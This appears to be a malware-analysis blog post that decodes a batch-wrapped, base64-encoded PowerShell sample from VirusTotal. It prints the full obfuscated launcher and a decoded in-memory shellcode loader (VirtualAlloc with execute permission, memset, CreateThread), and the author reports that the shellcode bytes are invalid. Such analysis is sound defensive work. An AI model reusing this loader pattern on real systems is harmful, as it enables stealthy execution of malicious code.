Powershell 2 Shellcode Part I

 

The hunt:

I do my searches on VirusTotal for this blog. After a quick search I managed to find a cute sample to play with. The file is a piece of Windows Batch script, you can view it’s contents down bellow:

::[Bat To Exe Converter]
::
::YAwzoRdxOk+EWAnk
::fBw5plQjdG8=
::YAwzuBVtJxjWCl3EqQJgSA==
::ZR4luwNxJguZRRnk
::Yhs/ulQjdF+5
::cxAkpRVqdFKZSDk=
::cBs/ulQjdF+5
::ZR41oxFsdFKZSDk=
::eBoioBt6dFKZSDk=
::cRo6pxp7LAbNWATEpCI=
::egkzugNsPRvcWATEpCI=
::dAsiuh18IRvcCxnZtBJQ
::cRYluBh/LU+EWAnk
::YxY4rhs+aU+JeA==
::cxY6rQJ7JhzQF1fEqQJQ
::ZQ05rAF9IBncCkqN+0xwdVs0
::ZQ05rAF9IAHYFVzEqQJQ
::eg0/rx1wNQPfEVWB+kM9LVsJDGQ=
::fBEirQZwNQPfEVWB+kM9LVsJDGQ=
::cRolqwZ3JBvQF1fEqQJQ
::dhA7uBVwLU+EWDk=
::YQ03rBFzNR3SWATElA==
::dhAmsQZ3MwfNWATElA==
::ZQ0/vhVqMQ3MEVWAtB9wSA==
::Zg8zqx1/OA3MEVWAtB9wSA==
::dhA7pRFwIByZRRnk
::Zh4grVQjdDWDJEuL+1YMDB5HRxCNLFeeE5cV+/zT7ueKowxTUfo6GA==
::YB416Ek+ZG8=
::
::
::978f952a14a936cc963da21a135fa983
powershell -w 1 -C "sv LjP -;
sv RG ec;
sv eVG ((gv LjP).value.toString()+(gv RG).value.toString());
powershell (gv eVG).value.toString() 'JABzAG0AQwBVACAAPQAgACcAJABpAEsARgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABpAEsARgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkADkALAAwAHgAYwA5ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAYgBhACwAMAB4ADEAMAAsADAAeAA5ADAALAAwAHgAMQA3ACwAMAB4ADAAYgAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA2ADAALAAwAHgAMwAxACwAMAB4ADUAMAAsADAAeAAxADgALAAwAHgAOAAzACwAMAB4AGUAOAAsADAAeABmAGMALAAwAHgAMAAzACwAMAB4ADUAMAAsADAAeAAwADQALAAwAHgANwAyACwAMAB4AGUAMgAsADAAeABmADcALAAwAHgAYwBjACwAMAB4AGYAMAAsADAAeAAwAGQALAAwAHgAMAA4ACwAMAB4ADAAYwAsADAAeAA5ADUALAAwAHgAOAA0ACwAMAB4AGUAZAAsADAAeAAzAGQALAAwAHgAOQA1ACwAMAB4AGYAMwAsADAAeAA2ADYALAAwAHgANgBkACwAMAB4ADIANQAsADAAeAA3ADcALAAwAHgAMgBhACwAMAB4ADgAMQAsADAAeABjAGUALAAwAHgAZAA1ACwAMAB4AGQAZgAsADAAeAAxADIALAAwAHgAYQAyACwAMAB4AGYAMQAsADAAeABkADAALAAwAHgAOQAzACwAMAB4ADAAOQAsADAAeAAyADQALAAwAHgAZABlACwAMAB4ADIANAAsADAAeAAyADEALAAwAHgAMQA0ACwAMAB4ADQAMQAsADAAeABhADYALAAwAHgAMwA4ACwAMAB4ADQAOQAsADAAeABhADEALAAwAHgAOQA3ACwAMAB4AGYAMgAsADAAeAA5AGMALAAwAHgAYQAwACwAMAB4AGQAMAAsADAAeABlAGYALAAwAHgANgBkACwAMAB4AGYAMAAsADAAeAA4ADkALAAwAHgANgA0ACwAMAB4AGMAMwAsADAAeABlADUALAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkADgALAAwAHgAOABlACwAMAB4ADgAYwAsADAAeABkADQALAAwAHgANQA4ACwAMAB4ADcAMgAsADAAeAA0ADQALAAwAHgAZAA2ACwAMAB4ADQAOQAsADAAeAAyADUALAAwAHgAZABmACwAMAB4ADgAMQAsADAAeAA0ADkALAAwAHgAYwA3ACwAMAB4ADAAYwAsADAAeABiAGEALAAwAHgAYwAzACwAMAB4AGQAZgAsADAAeAA1ADEALAAwAHgAOAA3ACwAMAB4ADkAYQAsADAAeAA1ADQALAAwAHgAYQAxACwAMAB4ADcAMwAsADAAeAAxAGQALAAwAHgAYgBkACwAMAB4AGYAOAAsADAAeAA3AGMALAAwAHgAYgAyACwAMAB4ADgAMAAsADAAeAAzADUALAAwAHgAOABmACwAMAB4AGMAYQAsADAAeABjADUALAAwAHgAZgAxACwAMAB4ADcAMAAsADAAeABiADkALAAwAHgAMwBmACwAMAB4ADAAMgAsADAAeAAwAGMALAAwAHgAYgBhACwAMAB4AGYAYgAsADAAeAA3ADkALAAwAHgAYwBhACwAMAB4ADQAZgAsADAAeAAxADgALAAwAHgAZAA5ACwAMAB4ADkAOQAsADAAeABlADgALAAwAHgAYwA0ACwAMAB4AGQAOAAsADAAeAA0AGUALAAwAHgANgBlACwAMAB4ADgAZQAsADAAeABkADYALAAwAHgAMwBiACwAMAB4AGUANAAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGIAYQAsADAAeAAyADkALAAwAHgANgAzACwAMAB4ADAANgAsADAAeAAzADYALAAwAHgAYwBjACwAMAB4AGEANAAsADAAeAA4AGYALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeAA2ADAALAAwAHgAZAA0ACwAMAB4AGQANwAsADAAeAA5ADIALAAwAHgAMwAxACwAMAB4AGIAMAAsADAAeABiADYALAAwAHgAYQBiACwAMAB4ADIAMgAsADAAeAAxAGIALAAwAHgANgA2ACwAMAB4ADAAZQAsADAAeAAyADgALAAwAHgAYgAxACwAMAB4ADcAMwAsADAAeAAyADMALAAwAHgANwAzACwAMAB4AGQAZAAsADAAeABlAGQALAAwAHgANQA5ACwAMAB4AGYAOAAsADAAeAAxAGQALAAwAHgAOQBhACwAMAB4AGQANgAsADAAeAA2ADkALAAwAHgANwAzACwAMAB4ADMAMwAsADAAeAA0AGQALAAwAHgAMAAyACwAMAB4AGMANwAsADAAeABiADQALAAwAHgANABiACwAMAB4AGQANQAsADAAeAAyADgALAAwAHgAZQBmACwAMAB4AGEANQAsADAAeAAwADIALAAwAHgAOAA1ACwAMAB4ADQAMwAsADAAeAA5ADUALAAwAHgAZQA3ACwAMAB4ADcAYQAsADAAeAAwAGMALAAwAHgAMgAzACwAMAB4ADUAZQAsADAAeAAwADUALAAwAHgANgBiACwAMAB4AGEAYwAsADAAeAA4AGIALAAwAHgAYQA2ACwAMAB4ADIAMAAsADAAeAAzADkALAAwAHgAMwA3ACwAMAB4ADEAYgAsADAAeAA5ADQALAAwAHgAZAA1ACwAMAB4ADgAYwAsADAAeAA5AGEALAAwAHgAMQBhACwAMAB4ADIANgAsADAAeAAxAGIALAAwAHgAMgBjACwAMAB4ADEAYQAsADAAeAAyADYALAAwAHgAZABiACwAMAB4ADYAMwAsADAAeAAyADkALAAwAHgANwA2ACwAMAB4ADkAOQAsADAAeAAxAGUALAAwAHgAMwA5ACwAMAB4ADQAZQAsADAAeAA2AGQALAAwAHgAYgA5ACwAMAB4AGEAYQAsADAAeABlADMALAAwAHgAYwA4ACwAMAB4ADcANgAsADAAeAA0ADQALAAwAHgAYQBkACwAMAB4AGYAZgAsADAAeABjADEALAAwAHgAYwAwACwAMAB4ADIAYwAsADAAeAA0ADgALAAwAHgAZQAyACwAMAB4ADkAZQAsADAAeABmAGYALAAwAHgAMABhACwAMAB4ADQAOAAsADAAeAAzADkALAAwAHgANgA3ACwAMAB4AGIAYgAsADAAeAAzADEALAAwAHgAYQA0ACwAMAB4ADYANwAsADAAeABlAGIALAAwAHgAZAA5ACwAMAB4ADcAMQAsADAAeABlADEALAAwAHgAOQA0ACwAMAB4AGQAZgAsADAAeAA4ADEALAAwAHgAMgA0ACwAMAB4ADIAMwAsADAAeAAxADkALAAwAHgAMgBlACwAMAB4AGEAZgAsADAAeAAzADQALAAwAHgAOQA3ACwAMAB4ADMAMQAsADAAeABhAGIALAAwAHgANgA2ACwAMAB4ADgANAAsADAAeABlADIALAAwAHgAZQAzACwAMAB4AGQAYgAsADAAeAA3AGMALAAwAHgANgBkACwAMAB4AGUANwAsADAAeAA4ADkALAAwAHgAYQBlACwAMAB4ADUANgAsADAAeAAwADgALAAwAHgAZQA0ACwAMAB4ADMAOAAsADAAeABjADIALAAwAHgAZgBjACwAMAB4ADUAOAAsADAAeAAyAGMALAAwAHgAOQAzACwAMAB4ADMAMgAsADAAeAA2ADcALAAwAHgAYQBjACwAMAB4ADEAYQAsADAAeABkADQALAAwAHgAMABkACwAMAB4AGEAOAAsADAAeAA0AGMALAAwAHgANwBmACwAMAB4AGMAZAAsADAAeABlADYALAAwAHgAMAA0ACwAMAB4ADAAYQAsADAAeABiADcALAAwAHgAOQA4ACwAMAB4ADUAMwAsADAAeAAwAGIALAAwAHgAZQAyACwAMAB4AGYANwAsADAAeAAwADgALAAwAHgAYQA3ACwAMAB4ADUAZQAsADAAeABhADEALAAwAHgAYwA2ACwAMAB4ADYAYQAsADAAeAA2ADcALAAwAHgANQA1ACwAMAB4ADYAYwAsADAAeAA4AGEALAAwAHgAYgAyACwAMAB4AGUAMAAsADAAeAA1ADIALAAwAHgAMAAxACwAMAB4ADIAYgAsADAAeAA4ADIALAAwAHgAZABhACwAMAB4AGYAOQAsADAAeAA1ADMALAAwAHgANQAyACwAMAB4AGIAMwAsADAAeABiADkALAAwAHgAYQAzACwAMAB4ADYANwAsADAAeABhADMALAAwAHgAYgBkACwAMAB4ADkAMQAsADAAeABjADgALAAwAHgANQA2ACwAMAB4ADgAZgAsADAAeAA3ADIALAAwAHgAMgA2ACwAMAB4ADIAZAAsADAAeABhAGQALAAwAHgAZAA1ACwAMAB4ADMAOQAsADAAeAA5AGIALAAwAHgAZAA4ACwAMAB4ADkAOQAsADAAeABhAGQALAAwAHgAMgA0ACwAMAB4ADAAZAAsADAAeAAxAGEALAAwAHgAMgBkACwAMAB4ADQAZAAsADAAeAAyAGQALAAwAHgAMQBhACwAMAB4ADYAZAAsADAAeAA4AGQALAAwAHgANwBlACwAMAB4ADcAMgAsADAAeAAzADUALAAwAHgAMgA5ACwAMAB4AGQAMwAsADAAeAA2ADcALAAwAHgAMwBhACwAMAB4AGUANAAsADAAeAA0ADcALAAwAHgAMwA0ACwAMAB4ADkANwAsADAAeAA4AGUALAAwAHgAOABmACwAMAB4AGUAYwAsADAAeAA3AGYALAAwAHgAOQAxACwAMAB4ADYAZgAsADAAeAAxADMALAAwAHgANwBmACwAMAB4AGMAMgAsADAAeAAzADkALAAwAHgANwBiACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANABjACwAMAB4ADkAOQAsADAAeAA2AGUALAAwAHgAYQBmACwAMAB4AGMAYQAsADAAeAA5AGUALAAwAHgAZQA0ACwAMAB4ADkAZAAsADAAeAA1AGUALAAwAHgAMQA5ACwAMAB4ADAANQAsADAAeABkAGQALAAwAHgAZQA0ACwAMAB4AGUANgAsADAAeAA3ADAALAAwAHgAMAA0ACwAMAB4AGIAZQAsADAAeAAyADUALAAwAHgAMgA1ACwAMAB4ADIAZQAsADAAeAA1ADYALAAwAHgANQA1ACwAMAB4ADIANgAsADAAeAA1ADEALAAwAHgAOQBhACwAMAB4ADkAOAAsADAAeABmADYALAAwAHgAOQBkACwAMAB4AGUAOAAsADAAeABmADQALAAwAHgAMwA3ACwAMAB4AGQANQAsADAAeAAyADcALAAwAHgAMgA3ACwAMAB4ADAANgAsADAAeAAyADEALAAwAHgANwBkACwAMAB4ADMANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAWQBCAHAAQwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAWQBCAHAAQwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAWQBCAHAAQwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAbQBDAFUAKQApADsAJABIAGUATABzACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFcAegBKACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAFcAegBKACAAJABIAGUATABzACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAEgAZQBMAHMAIAAkAGUAIgA7AH0A'"

Reverse it

If you look closely you’ll rapidly see at the end of the code a powershell keyword. This script is meant to run a powershell process with a very long command line attached to it.

The script has an big embedded string in it which looks as if it’s a base64 encoded string. This one is passed to another powershell process using the “encodedcommand” argument which can be seen on line 35.

Let’s open our good friend CyberChef, this tool will help us decode that base64 string very easily. In the left pane we can find the “From Base64” and “Decode text”, we select those and paste our encoded string in the text area and bake! BTW, you need to specify the encoding to be “UTF16LE”.

$smCU = '$iKF = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $iKF -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xc9,0xd9,0x74,0x24,0xf4,0x58,0xba,0x10,0x90,0x17,0x0b,0x2b,0xc9,0xb1,0x60,0x31,0x50,0x18,0x83,0xe8,0xfc,0x03,0x50,0x04,0x72,0xe2,0xf7,0xcc,0xf0,0x0d,0x08,0x0c,0x95,0x84,0xed,0x3d,0x95,0xf3,0x66,0x6d,0x25,0x77,0x2a,0x81,0xce,0xd5,0xdf,0x12,0xa2,0xf1,0xd0,0x93,0x09,0x24,0xde,0x24,0x21,0x14,0x41,0xa6,0x38,0x49,0xa1,0x97,0xf2,0x9c,0xa0,0xd0,0xef,0x6d,0xf0,0x89,0x64,0xc3,0xe5,0xbe,0x31,0xd8,0x8e,0x8c,0xd4,0x58,0x72,0x44,0xd6,0x49,0x25,0xdf,0x81,0x49,0xc7,0x0c,0xba,0xc3,0xdf,0x51,0x87,0x9a,0x54,0xa1,0x73,0x1d,0xbd,0xf8,0x7c,0xb2,0x80,0x35,0x8f,0xca,0xc5,0xf1,0x70,0xb9,0x3f,0x02,0x0c,0xba,0xfb,0x79,0xca,0x4f,0x18,0xd9,0x99,0xe8,0xc4,0xd8,0x4e,0x6e,0x8e,0xd6,0x3b,0xe4,0xc8,0xfa,0xba,0x29,0x63,0x06,0x36,0xcc,0xa4,0x8f,0x0c,0xeb,0x60,0xd4,0xd7,0x92,0x31,0xb0,0xb6,0xab,0x22,0x1b,0x66,0x0e,0x28,0xb1,0x73,0x23,0x73,0xdd,0xed,0x59,0xf8,0x1d,0x9a,0xd6,0x69,0x73,0x33,0x4d,0x02,0xc7,0xb4,0x4b,0xd5,0x28,0xef,0xa5,0x02,0x85,0x43,0x95,0xe7,0x7a,0x0c,0x23,0x5e,0x05,0x6b,0xac,0x8b,0xa6,0x20,0x39,0x37,0x1b,0x94,0xd5,0x8c,0x9a,0x1a,0x26,0x1b,0x2c,0x1a,0x26,0xdb,0x63,0x29,0x76,0x99,0x1e,0x39,0x4e,0x6d,0xb9,0xaa,0xe3,0xc8,0x76,0x44,0xad,0xff,0xc1,0xc0,0x2c,0x48,0xe2,0x9e,0xff,0x0a,0x48,0x39,0x67,0xbb,0x31,0xa4,0x67,0xeb,0xd9,0x71,0xe1,0x94,0xdf,0x81,0x24,0x23,0x19,0x2e,0xaf,0x34,0x97,0x31,0xab,0x66,0x84,0xe2,0xe3,0xdb,0x7c,0x6d,0xe7,0x89,0xae,0x56,0x08,0xe4,0x38,0xc2,0xfc,0x58,0x2c,0x93,0x32,0x67,0xac,0x1a,0xd4,0x0d,0xa8,0x4c,0x7f,0xcd,0xe6,0x04,0x0a,0xb7,0x98,0x53,0x0b,0xe2,0xf7,0x08,0xa7,0x5e,0xa1,0xc6,0x6a,0x67,0x55,0x6c,0x8a,0xb2,0xe0,0x52,0x01,0x2b,0x82,0xda,0xf9,0x53,0x52,0xb3,0xb9,0xa3,0x67,0xa3,0xbd,0x91,0xc8,0x56,0x8f,0x72,0x26,0x2d,0xad,0xd5,0x39,0x9b,0xd8,0x99,0xad,0x24,0x0d,0x1a,0x2d,0x4d,0x2d,0x1a,0x6d,0x8d,0x7e,0x72,0x35,0x29,0xd3,0x67,0x3a,0xe4,0x47,0x34,0x97,0x8e,0x8f,0xec,0x7f,0x91,0x6f,0x13,0x7f,0xc2,0x39,0x7b,0x6d,0x72,0x4c,0x99,0x6e,0xaf,0xca,0x9e,0xe4,0x9d,0x5e,0x19,0x05,0xdd,0xe4,0xe6,0x70,0x04,0xbe,0x25,0x25,0x2e,0x56,0x55,0x26,0x51,0x9a,0x98,0xf6,0x9d,0xe8,0xf4,0x37,0xd5,0x27,0x27,0x06,0x21,0x7d,0x37;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$YBpC=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($YBpC.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$YBpC,0,0,0);for (;;){Start-sleep 60};';
$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($smCU));
$HeLs = "-ec ";
if([IntPtr]::Size -eq 8) {
	$WzJ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";
	iex "& $WzJ $HeLs $e"
}
else {
iex "& powershell $HeLs $e";
}

After a bit of formating, we can start reading the second layer of the packed code.

Again we see a large variable with a pretty big string in it, this time the string is in clear text and it’s not encoded as previously. Inside a couple of “IF” statements, the variable is then fed to the “IEX” command.

“IEX” stands for Invoke EXpression” and it’s the shorthand notation for the “Invoke-Expression” command in powershell. “IEX” is similar to the “eval” command from other languages like Javascript.

Now we understand the goal of this second layer, it takes a piece of Powershell code, stores it inside a variable and executes it. Let’s focus our attention on the script inside that variable:

$iKF = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$w = Add-Type -memberDefinition $iKF -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$z = 0xd9,0xc9,0xd9,0x74,0x24,0xf4,0x58,0xba,0x10,0x90,0x17,0x0b,0x2b,0xc9,0xb1,0x60,0x31,0x50,0x18,0x83,0xe8,0xfc,0x03,0x50,0x04,0x72,0xe2,0xf7,0xcc,0xf0,0x0d,0x08,0x0c,0x95,0x84,0xed,0x3d,0x95,0xf3,0x66,0x6d,0x25,0x77,0x2a,0x81,0xce,0xd5,0xdf,0x12,0xa2,0xf1,0xd0,0x93,0x09,0x24,0xde,0x24,0x21,0x14,0x41,0xa6,0x38,0x49,0xa1,0x97,0xf2,0x9c,0xa0,0xd0,0xef,0x6d,0xf0,0x89,0x64,0xc3,0xe5,0xbe,0x31,0xd8,0x8e,0x8c,0xd4,0x58,0x72,0x44,0xd6,0x49,0x25,0xdf,0x81,0x49,0xc7,0x0c,0xba,0xc3,0xdf,0x51,0x87,0x9a,0x54,0xa1,0x73,0x1d,0xbd,0xf8,0x7c,0xb2,0x80,0x35,0x8f,0xca,0xc5,0xf1,0x70,0xb9,0x3f,0x02,0x0c,0xba,0xfb,0x79,0xca,0x4f,0x18,0xd9,0x99,0xe8,0xc4,0xd8,0x4e,0x6e,0x8e,0xd6,0x3b,0xe4,0xc8,0xfa,0xba,0x29,0x63,0x06,0x36,0xcc,0xa4,0x8f,0x0c,0xeb,0x60,0xd4,0xd7,0x92,0x31,0xb0,0xb6,0xab,0x22,0x1b,0x66,0x0e,0x28,0xb1,0x73,0x23,0x73,0xdd,0xed,0x59,0xf8,0x1d,0x9a,0xd6,0x69,0x73,0x33,0x4d,0x02,0xc7,0xb4,0x4b,0xd5,0x28,0xef,0xa5,0x02,0x85,0x43,0x95,0xe7,0x7a,0x0c,0x23,0x5e,0x05,0x6b,0xac,0x8b,0xa6,0x20,0x39,0x37,0x1b,0x94,0xd5,0x8c,0x9a,0x1a,0x26,0x1b,0x2c,0x1a,0x26,0xdb,0x63,0x29,0x76,0x99,0x1e,0x39,0x4e,0x6d,0xb9,0xaa,0xe3,0xc8,0x76,0x44,0xad,0xff,0xc1,0xc0,0x2c,0x48,0xe2,0x9e,0xff,0x0a,0x48,0x39,0x67,0xbb,0x31,0xa4,0x67,0xeb,0xd9,0x71,0xe1,0x94,0xdf,0x81,0x24,0x23,0x19,0x2e,0xaf,0x34,0x97,0x31,0xab,0x66,0x84,0xe2,0xe3,0xdb,0x7c,0x6d,0xe7,0x89,0xae,0x56,0x08,0xe4,0x38,0xc2,0xfc,0x58,0x2c,0x93,0x32,0x67,0xac,0x1a,0xd4,0x0d,0xa8,0x4c,0x7f,0xcd,0xe6,0x04,0x0a,0xb7,0x98,0x53,0x0b,0xe2,0xf7,0x08,0xa7,0x5e,0xa1,0xc6,0x6a,0x67,0x55,0x6c,0x8a,0xb2,0xe0,0x52,0x01,0x2b,0x82,0xda,0xf9,0x53,0x52,0xb3,0xb9,0xa3,0x67,0xa3,0xbd,0x91,0xc8,0x56,0x8f,0x72,0x26,0x2d,0xad,0xd5,0x39,0x9b,0xd8,0x99,0xad,0x24,0x0d,0x1a,0x2d,0x4d,0x2d,0x1a,0x6d,0x8d,0x7e,0x72,0x35,0x29,0xd3,0x67,0x3a,0xe4,0x47,0x34,0x97,0x8e,0x8f,0xec,0x7f,0x91,0x6f,0x13,0x7f,0xc2,0x39,0x7b,0x6d,0x72,0x4c,0x99,0x6e,0xaf,0xca,0x9e,0xe4,0x9d,0x5e,0x19,0x05,0xdd,0xe4,0xe6,0x70,0x04,0xbe,0x25,0x25,0x2e,0x56,0x55,0x26,0x51,0x9a,0x98,0xf6,0x9d,0xe8,0xf4,0x37,0xd5,0x27,0x27,0x06,0x21,0x7d,0x37;
$g = 0x1000;
if ($z.Length -gt 0x1000){
    $g = $z.Length
};
$YBpC=$w::VirtualAlloc(0,0x1000,$g,0x40);
for ($i=0;$i -le ($z.Length-1);$i++) {
    $w::memset([IntPtr]($YBpC.ToInt32()+$i), $z[$i], 1)
};
$w::CreateThread(0,0,$YBpC,0,0,0);
for (;;){
    Start-sleep 60
};

Now we can see two DLL imports: “kernel32.dll” and “msvcrt.dll”.  We’ll focus our attention on “kernel32.dll” because later in the code we see a call to a couple of it’s functions.

Kernel32.dll exports multiple routines that can be used to interact with the Windows OS to allocate memory, create processes, interact with files, etc.

On line no. 8, a byte array is stored in the “$z” variable, interesting, let’s continue reading the code. A few lines down we see a call to the “VirtualAlloc” routine from Kernel32. If we look for the prototype of the function on MSDN, we’ll understand that it allocates a piece of memory.

LPVOID WINAPI VirtualAlloc(
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);

The second arguments is for the length of the memory buffer (0x1000) and the last one is page permission. Value 0x40 stands for PAGE_EXECUTE_READWRITE which instructs the CPU that the buffer can be used to store code and that it has permission to EXECUTE ,READ and WRITE (captain obvious).

$YBpC=$w::VirtualAlloc(0,0x1000,$g,0x40);

Another few lines down we see a call to “memset” and “CreateThread”. The first one copies the byte array in the newly allocated buffer, and the second one creates a thread inside the current process (PowerShell) out of that code previously moved in our buffer.

Bad end

This looks like we found a shellcode that should be executed in the context of the powershell process, but after further inspection, the bytes do not disassemble into legitimate x86 instructions. Noob mistake, I should have checked the opcodes before writing this.
Because of the bad ending, in the next post I will continue with a working malware that has a good shellcode: 009a2c4a8d4b77935d8435dc091e2efebfacabe4cc80bf7c4ff185c4d8b7fd37

C ya soon.

SHA256:

  • 3c1c70ec676bc8c10a2767a3089f83103386fdd38592cfa4b5d6444a3b7ef93c

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s